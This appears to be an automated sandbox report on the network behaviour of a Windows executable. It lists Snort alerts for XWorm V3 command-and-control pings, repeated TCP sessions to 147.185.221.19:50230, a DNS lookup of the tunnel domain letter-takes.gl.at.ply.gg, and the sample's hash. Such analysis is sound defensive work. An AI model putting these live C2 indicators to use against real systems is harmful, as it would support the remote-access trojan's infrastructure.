Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
06/11/24-20:10:07.181847	TCP	2853193	ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound	53194	50230	192.168.2.4	147.185.221.19
06/11/24-20:08:24.216639	TCP	2855924	ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound	53174	50230	192.168.2.4	147.185.221.19

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 11, 2024 20:07:25.063222885 CEST	53164	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:07:25.070426941 CEST	50230	53164	147.185.221.19	192.168.2.4
Jun 11, 2024 20:07:25.074671984 CEST	53164	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:07:25.307912111 CEST	53164	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:07:25.312891006 CEST	50230	53164	147.185.221.19	192.168.2.4
Jun 11, 2024 20:07:33.541506052 CEST	50230	53164	147.185.221.19	192.168.2.4
Jun 11, 2024 20:07:33.541620016 CEST	53164	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:07:34.494431973 CEST	53164	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:07:34.497097015 CEST	53165	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:07:34.499226093 CEST	50230	53164	147.185.221.19	192.168.2.4
Jun 11, 2024 20:07:34.501894951 CEST	50230	53165	147.185.221.19	192.168.2.4
Jun 11, 2024 20:07:34.501957893 CEST	53165	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:07:34.524550915 CEST	53165	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:07:34.529534101 CEST	50230	53165	147.185.221.19	192.168.2.4
Jun 11, 2024 20:07:42.980521917 CEST	50230	53165	147.185.221.19	192.168.2.4
Jun 11, 2024 20:07:42.980602980 CEST	53165	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:07:43.724230051 CEST	53165	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:07:43.729087114 CEST	50230	53165	147.185.221.19	192.168.2.4
Jun 11, 2024 20:07:43.741734028 CEST	53166	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:07:43.746746063 CEST	50230	53166	147.185.221.19	192.168.2.4
Jun 11, 2024 20:07:43.747183084 CEST	53166	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:07:43.841696978 CEST	53166	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:07:43.851214886 CEST	50230	53166	147.185.221.19	192.168.2.4
Jun 11, 2024 20:07:52.232450962 CEST	50230	53166	147.185.221.19	192.168.2.4
Jun 11, 2024 20:07:52.232543945 CEST	53166	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:07:55.530131102 CEST	53166	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:07:55.535271883 CEST	50230	53166	147.185.221.19	192.168.2.4
Jun 11, 2024 20:07:59.958910942 CEST	53169	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:07:59.964699030 CEST	50230	53169	147.185.221.19	192.168.2.4
Jun 11, 2024 20:07:59.967314005 CEST	53169	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:08:00.222616911 CEST	53169	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:08:00.228283882 CEST	50230	53169	147.185.221.19	192.168.2.4
Jun 11, 2024 20:08:08.440921068 CEST	50230	53169	147.185.221.19	192.168.2.4
Jun 11, 2024 20:08:08.441006899 CEST	53169	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:08:08.634742975 CEST	53169	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:08:08.636301994 CEST	53172	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:08:08.640116930 CEST	50230	53169	147.185.221.19	192.168.2.4
Jun 11, 2024 20:08:08.641096115 CEST	50230	53172	147.185.221.19	192.168.2.4
Jun 11, 2024 20:08:08.641169071 CEST	53172	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:08:08.655635118 CEST	53172	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:08:08.660485983 CEST	50230	53172	147.185.221.19	192.168.2.4
Jun 11, 2024 20:08:17.115427017 CEST	50230	53172	147.185.221.19	192.168.2.4
Jun 11, 2024 20:08:17.119132996 CEST	53172	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:08:17.400568008 CEST	53172	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:08:17.405527115 CEST	50230	53172	147.185.221.19	192.168.2.4
Jun 11, 2024 20:08:19.452939987 CEST	53174	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:08:19.464093924 CEST	50230	53174	147.185.221.19	192.168.2.4
Jun 11, 2024 20:08:19.464422941 CEST	53174	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:08:19.724736929 CEST	53174	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:08:19.729773998 CEST	50230	53174	147.185.221.19	192.168.2.4
Jun 11, 2024 20:08:24.216639042 CEST	53174	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:08:24.221561909 CEST	50230	53174	147.185.221.19	192.168.2.4
Jun 11, 2024 20:08:27.937855005 CEST	50230	53174	147.185.221.19	192.168.2.4
Jun 11, 2024 20:08:27.938091040 CEST	53174	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:08:29.244949102 CEST	53174	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:08:29.250545025 CEST	50230	53174	147.185.221.19	192.168.2.4
Jun 11, 2024 20:08:31.420945883 CEST	53177	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:08:31.428380013 CEST	50230	53177	147.185.221.19	192.168.2.4
Jun 11, 2024 20:08:31.428472996 CEST	53177	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:08:31.525953054 CEST	53177	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:08:31.535480976 CEST	50230	53177	147.185.221.19	192.168.2.4
Jun 11, 2024 20:08:32.141520977 CEST	53177	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:08:32.146879911 CEST	50230	53177	147.185.221.19	192.168.2.4
Jun 11, 2024 20:08:37.072428942 CEST	53177	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:08:37.077918053 CEST	50230	53177	147.185.221.19	192.168.2.4
Jun 11, 2024 20:08:39.910844088 CEST	50230	53177	147.185.221.19	192.168.2.4
Jun 11, 2024 20:08:39.913060904 CEST	53177	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:08:42.509795904 CEST	53177	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:08:42.885073900 CEST	53177	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:08:42.915611029 CEST	50230	53177	147.185.221.19	192.168.2.4
Jun 11, 2024 20:08:42.915653944 CEST	50230	53177	147.185.221.19	192.168.2.4
Jun 11, 2024 20:08:42.915704012 CEST	53177	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:08:49.069950104 CEST	53181	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:08:49.075265884 CEST	50230	53181	147.185.221.19	192.168.2.4
Jun 11, 2024 20:08:49.075341940 CEST	53181	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:08:49.259097099 CEST	53181	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:08:49.264384031 CEST	50230	53181	147.185.221.19	192.168.2.4
Jun 11, 2024 20:08:54.619605064 CEST	53181	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:08:54.624659061 CEST	50230	53181	147.185.221.19	192.168.2.4
Jun 11, 2024 20:08:54.775572062 CEST	53181	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:08:54.780800104 CEST	50230	53181	147.185.221.19	192.168.2.4
Jun 11, 2024 20:08:57.555440903 CEST	50230	53181	147.185.221.19	192.168.2.4
Jun 11, 2024 20:08:57.555629969 CEST	53181	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:08:59.776969910 CEST	53181	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:08:59.782016993 CEST	50230	53181	147.185.221.19	192.168.2.4
Jun 11, 2024 20:09:02.109013081 CEST	53184	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:09:02.114674091 CEST	50230	53184	147.185.221.19	192.168.2.4
Jun 11, 2024 20:09:02.114752054 CEST	53184	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:09:02.156214952 CEST	53184	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:09:02.161348104 CEST	50230	53184	147.185.221.19	192.168.2.4
Jun 11, 2024 20:09:10.591578960 CEST	50230	53184	147.185.221.19	192.168.2.4
Jun 11, 2024 20:09:10.591681004 CEST	53184	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:09:12.275542021 CEST	53184	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:09:12.278574944 CEST	53185	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:09:12.280666113 CEST	50230	53184	147.185.221.19	192.168.2.4
Jun 11, 2024 20:09:12.283575058 CEST	50230	53185	147.185.221.19	192.168.2.4
Jun 11, 2024 20:09:12.283648014 CEST	53185	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:09:12.316503048 CEST	53185	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:09:12.321392059 CEST	50230	53185	147.185.221.19	192.168.2.4
Jun 11, 2024 20:09:12.322443962 CEST	53185	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:09:12.327308893 CEST	50230	53185	147.185.221.19	192.168.2.4
Jun 11, 2024 20:09:12.353751898 CEST	53185	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:09:12.360009909 CEST	50230	53185	147.185.221.19	192.168.2.4
Jun 11, 2024 20:09:12.416168928 CEST	53185	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:09:12.421247959 CEST	50230	53185	147.185.221.19	192.168.2.4
Jun 11, 2024 20:09:12.431797028 CEST	53185	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:09:12.436681986 CEST	50230	53185	147.185.221.19	192.168.2.4
Jun 11, 2024 20:09:12.494318008 CEST	53185	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:09:12.499500990 CEST	50230	53185	147.185.221.19	192.168.2.4
Jun 11, 2024 20:09:12.541168928 CEST	53185	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:09:12.546123028 CEST	50230	53185	147.185.221.19	192.168.2.4
Jun 11, 2024 20:09:12.650660992 CEST	53185	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:09:12.658386946 CEST	50230	53185	147.185.221.19	192.168.2.4
Jun 11, 2024 20:09:12.666269064 CEST	53185	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:09:12.671308994 CEST	50230	53185	147.185.221.19	192.168.2.4
Jun 11, 2024 20:09:20.764997005 CEST	50230	53185	147.185.221.19	192.168.2.4
Jun 11, 2024 20:09:20.765058994 CEST	53185	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:09:22.948730946 CEST	53185	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:09:22.953741074 CEST	50230	53185	147.185.221.19	192.168.2.4
Jun 11, 2024 20:09:22.961083889 CEST	53186	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:09:22.966207027 CEST	50230	53186	147.185.221.19	192.168.2.4
Jun 11, 2024 20:09:22.966269016 CEST	53186	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:09:23.038149118 CEST	53186	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:09:23.043353081 CEST	50230	53186	147.185.221.19	192.168.2.4
Jun 11, 2024 20:09:23.057956934 CEST	53186	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:09:23.064197063 CEST	50230	53186	147.185.221.19	192.168.2.4
Jun 11, 2024 20:09:23.072886944 CEST	53186	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:09:23.077717066 CEST	50230	53186	147.185.221.19	192.168.2.4
Jun 11, 2024 20:09:28.198378086 CEST	53186	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:09:28.203445911 CEST	50230	53186	147.185.221.19	192.168.2.4
Jun 11, 2024 20:09:28.213253975 CEST	53186	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:09:28.218432903 CEST	50230	53186	147.185.221.19	192.168.2.4
Jun 11, 2024 20:09:31.451505899 CEST	50230	53186	147.185.221.19	192.168.2.4
Jun 11, 2024 20:09:31.453619003 CEST	53186	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:09:33.231523037 CEST	53186	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:09:33.236649990 CEST	50230	53186	147.185.221.19	192.168.2.4
Jun 11, 2024 20:09:35.297857046 CEST	53189	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:09:35.303603888 CEST	50230	53189	147.185.221.19	192.168.2.4
Jun 11, 2024 20:09:35.303774118 CEST	53189	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:09:35.391484022 CEST	53189	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:09:35.396938086 CEST	50230	53189	147.185.221.19	192.168.2.4
Jun 11, 2024 20:09:36.697551966 CEST	53189	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:09:36.702800989 CEST	50230	53189	147.185.221.19	192.168.2.4
Jun 11, 2024 20:09:40.588191032 CEST	53189	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:09:40.593555927 CEST	50230	53189	147.185.221.19	192.168.2.4
Jun 11, 2024 20:09:43.772732973 CEST	50230	53189	147.185.221.19	192.168.2.4
Jun 11, 2024 20:09:43.775862932 CEST	53189	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:09:45.684993029 CEST	53189	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:09:45.684993029 CEST	53191	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:09:45.690046072 CEST	50230	53189	147.185.221.19	192.168.2.4
Jun 11, 2024 20:09:45.690068007 CEST	50230	53191	147.185.221.19	192.168.2.4
Jun 11, 2024 20:09:45.690642118 CEST	53191	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:09:45.870367050 CEST	53191	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:09:45.875183105 CEST	50230	53191	147.185.221.19	192.168.2.4
Jun 11, 2024 20:09:50.963182926 CEST	53191	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:09:50.968348026 CEST	50230	53191	147.185.221.19	192.168.2.4
Jun 11, 2024 20:09:54.165472031 CEST	50230	53191	147.185.221.19	192.168.2.4
Jun 11, 2024 20:09:54.169105053 CEST	53191	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:09:56.525542974 CEST	53191	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:09:56.527621031 CEST	53193	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:09:56.530842066 CEST	50230	53191	147.185.221.19	192.168.2.4
Jun 11, 2024 20:09:56.533214092 CEST	50230	53193	147.185.221.19	192.168.2.4
Jun 11, 2024 20:09:56.533318996 CEST	53193	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:09:56.569772005 CEST	53193	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:09:56.575386047 CEST	50230	53193	147.185.221.19	192.168.2.4
Jun 11, 2024 20:09:58.650599957 CEST	53193	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:09:58.655678034 CEST	50230	53193	147.185.221.19	192.168.2.4
Jun 11, 2024 20:10:05.006601095 CEST	50230	53193	147.185.221.19	192.168.2.4
Jun 11, 2024 20:10:05.006721973 CEST	53193	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:10:06.791323900 CEST	53193	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:10:06.793489933 CEST	53194	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:10:06.796463966 CEST	50230	53193	147.185.221.19	192.168.2.4
Jun 11, 2024 20:10:06.798619986 CEST	50230	53194	147.185.221.19	192.168.2.4
Jun 11, 2024 20:10:06.798691034 CEST	53194	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:10:06.835355043 CEST	53194	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:10:06.840233088 CEST	50230	53194	147.185.221.19	192.168.2.4
Jun 11, 2024 20:10:06.900763035 CEST	53194	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:10:06.906027079 CEST	50230	53194	147.185.221.19	192.168.2.4
Jun 11, 2024 20:10:06.947805882 CEST	53194	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:10:06.953413963 CEST	50230	53194	147.185.221.19	192.168.2.4
Jun 11, 2024 20:10:07.025975943 CEST	53194	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:10:07.031366110 CEST	50230	53194	147.185.221.19	192.168.2.4
Jun 11, 2024 20:10:07.119538069 CEST	53194	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:10:07.125350952 CEST	50230	53194	147.185.221.19	192.168.2.4
Jun 11, 2024 20:10:07.150665045 CEST	53194	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:10:07.155591965 CEST	50230	53194	147.185.221.19	192.168.2.4
Jun 11, 2024 20:10:07.181847095 CEST	53194	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:10:07.187026978 CEST	50230	53194	147.185.221.19	192.168.2.4
Jun 11, 2024 20:10:07.228853941 CEST	53194	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:10:07.233875990 CEST	50230	53194	147.185.221.19	192.168.2.4
Jun 11, 2024 20:10:15.274288893 CEST	50230	53194	147.185.221.19	192.168.2.4
Jun 11, 2024 20:10:15.277158976 CEST	53194	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:10:18.453516960 CEST	53194	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:10:18.468305111 CEST	53195	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:10:18.806687117 CEST	53194	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:10:19.328425884 CEST	50230	53194	147.185.221.19	192.168.2.4
Jun 11, 2024 20:10:19.328474045 CEST	50230	53195	147.185.221.19	192.168.2.4
Jun 11, 2024 20:10:19.328599930 CEST	50230	53194	147.185.221.19	192.168.2.4
Jun 11, 2024 20:10:19.328619957 CEST	53195	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:10:19.328701019 CEST	53194	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:10:19.421020031 CEST	53195	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:10:19.426285982 CEST	50230	53195	147.185.221.19	192.168.2.4
Jun 11, 2024 20:10:19.556945086 CEST	53195	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:10:19.562033892 CEST	50230	53195	147.185.221.19	192.168.2.4
Jun 11, 2024 20:10:19.619358063 CEST	53195	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:10:19.624317884 CEST	50230	53195	147.185.221.19	192.168.2.4
Jun 11, 2024 20:10:22.245033026 CEST	53195	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:10:22.413809061 CEST	50230	53195	147.185.221.19	192.168.2.4
Jun 11, 2024 20:10:23.026079893 CEST	53195	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:10:23.031766891 CEST	50230	53195	147.185.221.19	192.168.2.4
Jun 11, 2024 20:10:23.572685957 CEST	53195	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:10:23.577745914 CEST	50230	53195	147.185.221.19	192.168.2.4
Jun 11, 2024 20:10:24.838439941 CEST	53195	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:10:24.843678951 CEST	50230	53195	147.185.221.19	192.168.2.4
Jun 11, 2024 20:10:27.806608915 CEST	50230	53195	147.185.221.19	192.168.2.4
Jun 11, 2024 20:10:27.807861090 CEST	53195	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:10:29.870866060 CEST	53195	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:10:29.870867014 CEST	53197	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:10:29.876194954 CEST	50230	53195	147.185.221.19	192.168.2.4
Jun 11, 2024 20:10:29.876223087 CEST	50230	53197	147.185.221.19	192.168.2.4
Jun 11, 2024 20:10:29.876579046 CEST	53197	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:10:29.944607019 CEST	53197	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:10:29.949866056 CEST	50230	53197	147.185.221.19	192.168.2.4
Jun 11, 2024 20:10:38.358757019 CEST	50230	53197	147.185.221.19	192.168.2.4
Jun 11, 2024 20:10:38.358903885 CEST	53197	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:10:39.994851112 CEST	53197	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:10:39.996615887 CEST	53198	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:10:40.000936985 CEST	50230	53197	147.185.221.19	192.168.2.4
Jun 11, 2024 20:10:40.002743006 CEST	50230	53198	147.185.221.19	192.168.2.4
Jun 11, 2024 20:10:40.003040075 CEST	53198	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:10:40.213078976 CEST	53198	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:10:40.218283892 CEST	50230	53198	147.185.221.19	192.168.2.4
Jun 11, 2024 20:10:40.338361025 CEST	53198	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:10:40.343964100 CEST	50230	53198	147.185.221.19	192.168.2.4
Jun 11, 2024 20:10:40.604048967 CEST	53198	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:10:40.616159916 CEST	50230	53198	147.185.221.19	192.168.2.4
Jun 11, 2024 20:10:40.619735956 CEST	53198	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:10:40.624959946 CEST	50230	53198	147.185.221.19	192.168.2.4
Jun 11, 2024 20:10:40.651017904 CEST	53198	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:10:40.657303095 CEST	50230	53198	147.185.221.19	192.168.2.4
Jun 11, 2024 20:10:40.713435888 CEST	53198	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:10:40.718816996 CEST	50230	53198	147.185.221.19	192.168.2.4
Jun 11, 2024 20:10:40.760181904 CEST	53198	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:10:40.765721083 CEST	50230	53198	147.185.221.19	192.168.2.4
Jun 11, 2024 20:10:40.822875977 CEST	53198	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:10:40.828326941 CEST	50230	53198	147.185.221.19	192.168.2.4
Jun 11, 2024 20:10:40.838430882 CEST	53198	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:10:40.843676090 CEST	50230	53198	147.185.221.19	192.168.2.4
Jun 11, 2024 20:10:40.853842020 CEST	53198	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:10:40.859380960 CEST	50230	53198	147.185.221.19	192.168.2.4
Jun 11, 2024 20:10:48.213233948 CEST	53198	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:10:48.218116999 CEST	50230	53198	147.185.221.19	192.168.2.4
Jun 11, 2024 20:10:48.483464003 CEST	50230	53198	147.185.221.19	192.168.2.4
Jun 11, 2024 20:10:48.483625889 CEST	53198	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:10:50.963198900 CEST	53198	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:10:50.965904951 CEST	53200	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:10:50.968208075 CEST	50230	53198	147.185.221.19	192.168.2.4
Jun 11, 2024 20:10:50.970920086 CEST	50230	53200	147.185.221.19	192.168.2.4
Jun 11, 2024 20:10:50.970993042 CEST	53200	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:10:51.004328012 CEST	53200	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:10:51.010112047 CEST	50230	53200	147.185.221.19	192.168.2.4
Jun 11, 2024 20:10:52.261218071 CEST	53200	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:10:52.266242027 CEST	50230	53200	147.185.221.19	192.168.2.4
Jun 11, 2024 20:10:55.901124954 CEST	53200	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:10:55.906290054 CEST	50230	53200	147.185.221.19	192.168.2.4
Jun 11, 2024 20:10:59.450640917 CEST	50230	53200	147.185.221.19	192.168.2.4
Jun 11, 2024 20:10:59.451507092 CEST	53200	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:11:01.496469975 CEST	53200	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:11:01.496503115 CEST	53201	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:11:01.501576900 CEST	50230	53200	147.185.221.19	192.168.2.4
Jun 11, 2024 20:11:01.501605034 CEST	50230	53201	147.185.221.19	192.168.2.4
Jun 11, 2024 20:11:01.501858950 CEST	53201	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:11:01.689251900 CEST	53201	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:11:01.694272995 CEST	50230	53201	147.185.221.19	192.168.2.4
Jun 11, 2024 20:11:08.465347052 CEST	53201	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:11:08.470551968 CEST	50230	53201	147.185.221.19	192.168.2.4
Jun 11, 2024 20:11:08.481029034 CEST	53201	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:11:08.485901117 CEST	50230	53201	147.185.221.19	192.168.2.4
Jun 11, 2024 20:11:08.495093107 CEST	53201	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:11:08.499825001 CEST	50230	53201	147.185.221.19	192.168.2.4
Jun 11, 2024 20:11:08.635205030 CEST	53201	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:11:08.640430927 CEST	50230	53201	147.185.221.19	192.168.2.4
Jun 11, 2024 20:11:08.682038069 CEST	53201	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:11:08.686865091 CEST	50230	53201	147.185.221.19	192.168.2.4
Jun 11, 2024 20:11:08.713291883 CEST	53201	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:11:08.718198061 CEST	50230	53201	147.185.221.19	192.168.2.4
Jun 11, 2024 20:11:08.744647026 CEST	53201	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:11:08.749593019 CEST	50230	53201	147.185.221.19	192.168.2.4
Jun 11, 2024 20:11:08.760344028 CEST	53201	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:11:08.765152931 CEST	50230	53201	147.185.221.19	192.168.2.4
Jun 11, 2024 20:11:08.791791916 CEST	53201	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:11:08.796673059 CEST	50230	53201	147.185.221.19	192.168.2.4
Jun 11, 2024 20:11:08.947763920 CEST	53201	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:11:08.953361034 CEST	50230	53201	147.185.221.19	192.168.2.4
Jun 11, 2024 20:11:09.977479935 CEST	50230	53201	147.185.221.19	192.168.2.4
Jun 11, 2024 20:11:09.977951050 CEST	53201	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:11:19.869462967 CEST	53201	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:11:19.873883963 CEST	53203	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:11:19.874439001 CEST	50230	53201	147.185.221.19	192.168.2.4
Jun 11, 2024 20:11:19.879331112 CEST	50230	53203	147.185.221.19	192.168.2.4
Jun 11, 2024 20:11:19.879410982 CEST	53203	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:11:19.907553911 CEST	53203	50230	192.168.2.4	147.185.221.19
Jun 11, 2024 20:11:19.912763119 CEST	50230	53203	147.185.221.19	192.168.2.4
Jun 11, 2024 20:11:28.355209112 CEST	50230	53203	147.185.221.19	192.168.2.4
Jun 11, 2024 20:11:28.355282068 CEST	53203	50230	192.168.2.4	147.185.221.19

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 11, 2024 20:07:24.646483898 CEST	53	64507	1.1.1.1	192.168.2.4
Jun 11, 2024 20:07:25.049457073 CEST	64396	53	192.168.2.4	1.1.1.1
Jun 11, 2024 20:07:25.059401989 CEST	53	64396	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jun 11, 2024 20:07:25.049457073 CEST	192.168.2.4	1.1.1.1	0xef42	Standard query (0)	letter-takes.gl.at.ply.gg	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jun 11, 2024 20:07:25.059401989 CEST	1.1.1.1	192.168.2.4	0xef42	No error (0)	letter-takes.gl.at.ply.gg		147.185.221.19	A (IP address)	IN (0x0001)	false

Target ID:	0
Start time:	14:07:01
Start date:	11/06/2024
Path:	C:\Users\user\Desktop\ywXeiXEvP2.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\ywXeiXEvP2.exe"
Imagebase:	0x7ff7c0180000
File size:	3'817'238 bytes
MD5 hash:	A8A4603BC85E306E0FDD17655E4820E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
